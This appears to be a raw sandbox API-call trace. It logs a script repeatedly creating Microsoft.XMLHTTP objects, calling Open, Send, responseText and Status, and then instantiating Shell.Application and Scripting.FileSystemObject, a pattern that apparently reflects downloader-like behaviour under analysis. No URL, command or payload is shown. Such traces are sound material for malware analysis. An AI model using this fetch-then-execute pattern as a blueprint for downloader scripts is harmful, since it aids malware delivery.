	[0541.984] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bc0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0541.984] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0541.984] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0541.984] SysStringLen (param_1=0x0) returned 0x0
	[0541.984] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0541.984] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0541.984] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7560) returned 0x0
	[0541.984] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0541.985] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c28) returned 0x0
	[0541.985] ??2@YAPEAX_K@Z () returned 0x62f330
	[0541.985] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c28, pUnkSite=0x62f330) 
	[0541.985] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0541.985] XMLHTTPRequest:IUnknown:Release (This=0x49c5c28) returned 0x0
	[0541.985] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7560) returned 0x0
	[0541.985] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7560) returned 0x3
	[0541.985] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0541.985] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0541.985] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0541.985] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0541.985] SysStringLen (param_1=0x0) returned 0x0
	[0541.985] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0541.985] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0541.985] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0541.985] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0541.986] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0541.986] ??2@YAPEAX_K@Z () returned 0x62f310
	[0541.986] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f310) 
	[0541.986] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0541.986] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0541.986] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0541.986] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0541.986] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0541.986] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0541.986] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0541.986] longjmp () 
	[0541.986] longjmp () 
	[0541.986] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0541.986] SysStringLen (param_1=0x0) returned 0x0
	[0541.986] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0541.987] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0541.987] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5be0) returned 0x0
	[0541.987] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0541.987] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c48) returned 0x0
	[0541.987] ??2@YAPEAX_K@Z () returned 0x62f330
	[0541.987] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c48, pUnkSite=0x62f330) 
	[0541.987] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0541.987] XMLHTTPRequest:IUnknown:Release (This=0x49c5c48) returned 0x0
	[0541.987] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5be0) returned 0x0
	[0541.987] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5be0) returned 0x3
	[0541.987] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0541.987] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5be0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0541.987] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0541.987] longjmp () 
	[0541.988] longjmp () 
	[0541.988] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0541.988] SysStringLen (param_1=0x0) returned 0x0
	[0541.988] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0541.988] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0541.988] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0541.988] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0541.988] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0541.988] ??2@YAPEAX_K@Z () returned 0x62f310
	[0541.988] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f310) 
	[0541.988] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0541.988] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0541.988] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0541.988] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0541.988] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0541.988] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0541.988] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0541.989] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0541.989] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0541.989] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0543.665] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0543.665] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0543.665] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0543.666] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0543.666] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0543.666] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0543.666] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0543.666] SysStringLen (param_1=0x0) returned 0x0
	[0543.666] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0543.666] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0543.666] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0543.667] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0543.667] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0543.667] ??2@YAPEAX_K@Z () returned 0x62f350
	[0543.667] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0543.667] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0543.667] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0543.667] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0543.667] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0543.667] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0543.667] SysStringLen (param_1=0x0) returned 0x0
	[0543.667] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0543.670] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0543.670] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0543.670] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0543.670] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0543.670] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0543.670] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0549.366] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
